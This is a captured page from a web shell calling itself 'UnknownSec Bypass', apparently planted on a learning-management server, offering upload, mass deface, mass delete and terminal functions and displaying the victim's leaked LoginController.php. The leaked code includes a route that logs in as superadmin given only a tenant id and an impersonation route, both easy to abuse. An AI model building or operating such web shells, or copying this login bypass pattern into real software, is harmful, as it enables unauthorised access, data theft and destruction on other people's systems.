UnknownSec Bypass
403
:
/
mnt
/
lmsestudio-instance-vol002
/
lms_698bf930e912
/
app
/
Http
/
Controllers
/
Auth
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
LoginController.php
<?php namespace EstudioLMS\Http\Controllers\Auth; use Carbon\Carbon; use EstudioLMS\Models\Statistic\Login; use EstudioLMS\Repositories\Auth\UserRepository; use Illuminate\Http\Request; use EstudioLMS\Http\Requests; use EstudioLMS\Http\Controllers\Controller; use EstudioLMS\Repositories\Config\SaasConfigInterface; use Illuminate\Translation\Translator; class LoginController extends Controller { /** * @var UserRepository */ private $userRepository; /** * @var SaasConfigInterface */ private $saasConfig; /** * @var Translator */ private $translator; /** * LoginController constructor. * @param UserRepository $userRepository * @param SaasConfigInterface $saasConfig * @param Translator $translator */ public function __construct( UserRepository $userRepository, SaasConfigInterface $saasConfig, Translator $translator ) { $this->userRepository = $userRepository; $this->saasConfig = $saasConfig; $this->translator = $translator; } public function loginAs(Request $request) { \Session::forget('admin-mail'); if (!\Session::has('admin-mail')) { $data = $request->all(); $adminMail = \Auth::user()['email']; \Session::set('admin-mail', $adminMail); $user = $this->userRepository->skipCriteria() ->findWhere([ ['email', '=', $data['email']] ])->first(); if (count($user) > 0) { \Auth::login($user); } else { flash()->error('Usuário não encontrado'); } } else { flash()->error('Error!'); } return redirect(route('environment.index')); } public function backAs() { if (\Session::has('admin-mail')) { $adminMail = \Session::get('admin-mail'); $user = $this->userRepository->skipCriteria() ->findWhere([ ['email', '=', $adminMail] ])->first(); \Auth::login($user); \Session::forget('admin-mail'); } else { flash()->error('Error!'); } return redirect(route('environment.index')); } public function loginFromCPanel($tenantId) { $check = $this->saasConfig->findByField('tenant_id', $tenantId)->first(); if ($check) { $credentials = $this->userRepository->userByRole('superadmin'); if ($credentials) { \Auth::login($credentials); $token = bin2hex(openssl_random_pseudo_bytes(64)); $logged = auth()->user(); $logged['login_token'] = $token; $logged->save(); \Session::set('login_token', $token); $date = Carbon::now(); $dateStr = $date->toDateTimeString(); \Session::set('start_time', $dateStr); Login::create( [ 'login_token' => \Session::get('login_token'), 'user_id' => \Auth::user()->id, 'role_id' => \Auth::user()->roles()->first()->id, 'start' => $dateStr, 'end' => $dateStr, 'elapsed_minutes' => 0 ] ); return redirect(route('index')); } } else { return redirect('/auth')->withErrors([ 'error' => $this->translator->get('messages.lblCredentialsNotFound'), ]); } } }
Copyright © 2026 - UnknownSec